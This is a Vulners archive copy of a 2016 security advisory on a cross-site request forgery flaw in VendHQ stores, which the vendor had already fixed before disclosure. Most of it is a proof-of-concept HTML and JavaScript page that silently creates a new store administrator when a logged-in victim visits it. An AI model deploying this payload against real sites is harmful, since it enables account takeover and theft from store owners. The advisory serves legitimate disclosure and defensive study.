Vulners
Lucene search
VendHQ Cross Site Request Forgery
`# +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
# | ___ _ _____ _ _ |
# | / _ \| | |_ _| | | (_) |
# | / /_\ \ |__ ___ __ _ _ __ | | __ _| |__ _ _ __ |
# | | _ | '_ \/ __|/ _` | '_ \ | |/ _` | '_ \| | '__| |
# | | | | | | | \__ \ (_| | | | | | | (_| | | | | | | |
# | \_| |_/_| |_|___/\__,_|_| |_| \_/\__,_|_| |_|_|_| |
# | // Breaking Security Since Born! |
# | |
# | [-] Website: https://ahsantahir.py |
# | [-] Email: [email protected] |
# | |
# +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
###
# Title : VendHQ Add-admin CSRF Vulnerability [Full-Store Takeover]
# Author : Ahsan Tahir
# E-mail : [email protected] / [email protected]
# Web Site : www.ahsantahir.py
# Facebook: http://fb.me/ahsantahiratofficial
# Twitter : @AhsanTahirAT
# Tested on : Kali Linux 2.0, Windows 8.1
# Vendor : https://www.vendhq.com
###
Release Date:
=============
2016-10-14
Product & Service Introduction:
===============================
Vend is retail POS software, inventory management, ecommerce & customer loyalty
for iPad, Mac and PC. Easily manage & grow your business in the cloud.
Abstract Advisory Information:
==============================
Ahsan Tahir, an independent vulnerability researcher discovered an add-admin CSRF vulnerability, which
could lead to full store-takeover of any VendHQ store!
Vulnerability Disclosure Timeline:
==================================
2016-07-20: Found the vulnerability.
2016-07-20: Reported to vendor.
2016-07-22: Vendor Replied.
2016-07-22: Vendor Fixed the vulnerability.
2016-07-31: Vendor rewarded the researcher.
2016-10-14: Public Disclosure
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A Cross-Site Request Forgery vulnerability has been discovered in VendHQ stores.
This allows remote attackers to craft a HTML Form, which requests a new admin on vendhq stores, when
run by a victim, while he/she is logged in, and if the victim visits a page, his/her
store will be HACKED/Pwn3d!
Proof of Concept (PoC):
=======================
This vulnerability can be exploited by an attacker if he/she injects this code in his webpage, which
they want their victim to visit!
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://<your-store>.vendhq.com/user/create", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------30540262821640");
xhr.withCredentials = true;
var body = "-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[vend_image_user_new][id]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[id]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[name]\"\r\n" +
"\r\n" +
"Hacked\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[display_name]\"\r\n" +
"\r\n" +
"A cashier\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[email]\"\r\n" +
"\r\n" +
"[email protected]\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[password]\"\r\n" +
"\r\n" +
"TestingPassword1\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[password_again]\"\r\n" +
"\r\n" +
"TestingPassword1\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[group_id]\"\r\n" +
"\r\n" +
"5\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[outlet_id][]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------30540262821640\r\n" +
"Content-Disposition: form-data; name=\"vend_user[vend_image_user_new][image]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------30540262821640--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
While a victim is logged in to his/her vend store and visits a webpage with the above code
injected, a new admin will be created in their store, with the name as "Hacked" and the Password is "TestPassword1"
and email: [email protected]
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Oct 2016 00:00Current
0.4Low risk
Vulners AI Score0.4